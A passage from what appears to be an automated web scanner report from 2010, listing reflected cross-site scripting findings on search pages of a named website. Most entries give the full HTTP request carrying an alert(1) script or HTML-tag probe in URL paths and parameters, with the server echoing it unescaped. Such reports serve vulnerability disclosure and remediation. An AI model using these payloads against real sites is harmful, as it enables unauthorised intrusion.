Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=21cb22<a>48447151198 was not found on this server.</p>
...[SNIP]...

2.156. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e03c<script>alert(1)</script>e3e2ca9da62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult2e03c<script>alert(1)</script>e3e2ca9da62/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult2e03c<script>alert(1)</script>e3e2ca9da62/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.157. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df327<script>alert(1)</script>e0cdaaf125e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chatdf327<script>alert(1)</script>e0cdaaf125e/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chatdf327<script>alert(1)</script>e0cdaaf125e/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.158. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 17071<script>alert(1)</script>8f103a4606 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes17071<script>alert(1)</script>8f103a4606/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes17071<script>alert(1)</script>8f103a4606/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.159. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78aeb<script>alert(1)</script>ceb284645ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos78aeb<script>alert(1)</script>ceb284645ba/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos78aeb<script>alert(1)</script>ceb284645ba/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.160. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 80919<script>alert(1)</script>a1987097124 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/search.php80919<script>alert(1)</script>a1987097124?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/search.php80919<script>alert(1)</script>a1987097124?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.161. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 96086<a>a4840878056 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search96086<a>a4840878056&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search96086<a>a4840878056&opt=2 was not found on this server.</p>
...[SNIP]...

2.162. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e737a<a>edd04ff9331 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/search.php?keyword=search...e737a<a>edd04ff9331&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/search.php?keyword=search...e737a<a>edd04ff9331&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.163. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e6951<script>alert(1)</script>9baf8cfdda8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&e6951<script>alert(1)</script>9baf8cfdda8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&e6951<script>alert(1)</script>9baf8cfdda8=1 was not found on this server.</p>
...[SNIP]...

2.164. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c9a3b<a>1f4a4269ca2 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2c9a3b<a>1f4a4269ca2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2c9a3b<a>1f4a4269ca2 was not found on this server.</p>
...[SNIP]...

2.165. http://www.resellerbase.com/adult/media-chat/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cdb16<script>alert(1)</script>8334b993b77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultcdb16<script>alert(1)</script>8334b993b77/media-chat/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultcdb16<script>alert(1)</script>8334b993b77/media-chat/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.166. http://www.resellerbase.com/adult/media-chat/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 41b10<script>alert(1)</script>6a31b63013a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat41b10<script>alert(1)</script>6a31b63013a/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat41b10<script>alert(1)</script>6a31b63013a/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.167. http://www.resellerbase.com/adult/media-chat/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 899a3<script>alert(1)</script>3a7ebb1ad3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes899a3<script>alert(1)</script>3a7ebb1ad3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes899a3<script>alert(1)</script>3a7ebb1ad3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.168. http://www.resellerbase.com/adult/media-chat/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 24aa1<script>alert(1)</script>76fcbc1ab92 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/search.php24aa1<script>alert(1)</script>76fcbc1ab92?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/search.php24aa1<script>alert(1)</script>76fcbc1ab92?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.169. http://www.resellerbase.com/adult/media-chat/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e3557<a>4183794c2ae was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/search.php?keyword=search...&Submit3=Searche3557<a>4183794c2ae&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/search.php?keyword=search...&Submit3=Searche3557<a>4183794c2ae&opt=2 was not found on this server.</p>
...[SNIP]...

2.170. http://www.resellerbase.com/adult/media-chat/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f3214<a>f285eb5af96 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/search.php?keyword=search...f3214<a>f285eb5af96&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/search.php?keyword=search...f3214<a>f285eb5af96&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.171. http://www.resellerbase.com/adult/media-chat/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b74b8<script>alert(1)</script>f07e7420d7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/search.php?keyword=search...&Submit3=Search&opt=2&b74b8<script>alert(1)</script>f07e7420d7d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/search.php?keyword=search...&Submit3=Search&opt=2&b74b8<script>alert(1)</script>f07e7420d7d=1 was not found on this server.</p>
...[SNIP]...

2.172. http://www.resellerbase.com/adult/media-chat/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f7f62<a>a7c9cc1581c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/search.php?keyword=search...&Submit3=Search&opt=2f7f62<a>a7c9cc1581c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/search.php?keyword=search...&Submit3=Search&opt=2f7f62<a>a7c9cc1581c was not found on this server.</p>
...[SNIP]...

2.173. http://www.resellerbase.com/adult/more2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/more2.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 74283<script>alert(1)</script>46d21d49eeb324acb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

